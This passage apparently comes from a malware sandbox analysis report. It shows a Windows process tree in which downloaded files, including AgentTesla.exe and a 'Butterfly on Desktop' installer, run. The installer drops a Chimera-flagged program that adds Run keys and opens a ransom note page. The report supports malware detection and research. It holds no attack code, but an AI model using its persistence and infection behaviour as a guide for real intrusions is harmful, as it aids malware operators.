      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:8
      4⤵
      PID:4368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
      4⤵
      PID:2352
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
      4⤵
      PID:400
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
      4⤵
      PID:1212
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
      4⤵
      PID:4540
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
      4⤵
      PID:3048
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4056 /prefetch:8
      4⤵
      PID:2768
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4056 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:212
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
      4⤵
      PID:5176
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
      4⤵
      PID:5428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4008 /prefetch:1
      4⤵
      PID:5772
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
      4⤵
      PID:5352
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
      4⤵
      PID:5368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
      4⤵
      PID:5520
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
      4⤵
      PID:5540
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
      4⤵
      PID:5140
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
      4⤵
      PID:5504
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5960 /prefetch:1
      4⤵
      PID:5516
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1308 /prefetch:1
      4⤵
      PID:5456
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
      4⤵
      PID:5460
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:1
      4⤵
      PID:5984
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
      4⤵
      PID:5424
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
      4⤵
      PID:5356
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
      4⤵
      PID:5864
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6128 /prefetch:8
      4⤵
      PID:5824
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
      4⤵
      PID:5716
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:1
      4⤵
      PID:5200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6988 /prefetch:8
      4⤵
      PID:4668
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6664 /prefetch:8
      4⤵
      PID:6020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7136 /prefetch:8
      4⤵
      PID:4388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:1
      4⤵
      PID:5928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7296 /prefetch:8
      4⤵
      PID:4612
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6992 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5324
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5620
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6280 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5628
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:1
      4⤵
      PID:5172
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7292 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:6124
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:1
      4⤵
      PID:4424
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
      4⤵
      PID:5044
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7248 /prefetch:1
      4⤵
      PID:5572
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7256 /prefetch:1
      4⤵
      PID:5636
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5812 /prefetch:8
      4⤵
      PID:1788
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5408 /prefetch:8
      4⤵
      PID:5144
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4684 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2272
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
      4⤵
      PID:5652
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
      4⤵
      PID:4576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7672 /prefetch:1
      4⤵
      PID:5860
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2152,5000518464462067060,14515228480497859283,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6764 /prefetch:8
      4⤵
      PID:5852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5096,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5292 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5468,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5508 /prefetch:1
  2⤵
  PID:4352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5988,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5948 /prefetch:1
  2⤵
  PID:4456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5796,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3304 /prefetch:8
  2⤵
  PID:1756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5668,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4604 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5856,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4544 /prefetch:8
  2⤵
  PID:4348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5176,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4344 /prefetch:1
  2⤵
  PID:1900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4636,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5456 /prefetch:1
  2⤵
  PID:2924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=3268,i,7500946504219336592,14082658955787626460,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6132 /prefetch:1
  2⤵
  PID:632

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3792

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x2f4
1⤵
PID:5108

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3888

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\lb-phone\" -ad -an -ai#7zMap31851:78:7zEvent12853
1⤵
- Suspicious use of FindShellTrayWindow
PID:3328

C:\Users\Admin\Downloads\sledge.dev-esx-qb-converter.exe
"C:\Users\Admin\Downloads\sledge.dev-esx-qb-converter.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:932

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\good\New Text Document.txt
1⤵
PID:964

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\good\New Text Document.txt
1⤵
PID:2020

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:740

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4388

C:\Users\Admin\Downloads\AgentTesla.exe
"C:\Users\Admin\Downloads\AgentTesla.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:392

C:\Users\Admin\Downloads\butterflyondesktop.exe
"C:\Users\Admin\Downloads\butterflyondesktop.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1072
- C:\Users\Admin\AppData\Local\Temp\is-H1DSB.tmp\butterflyondesktop.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-H1DSB.tmp\butterflyondesktop.tmp" /SL5="$D022E,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:2756
- - C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe
    "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
    3⤵
    - Chimera
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops desktop.ini file(s)
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SendNotifyMessage
    PID:5876
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -k "C:\Users\Admin\Downloads\YOUR_FILES_ARE_ENCRYPTED.HTML"
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:4452
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4452 CREDAT:17410 /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:5324
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:4452 CREDAT:17416 /prefetch:2
        5⤵
        Checks processor information in registry
        Enumerates system info in registry
        Modifies Internet Explorer settings
        
        PID:4612
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html
    3⤵
    PID:6068
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
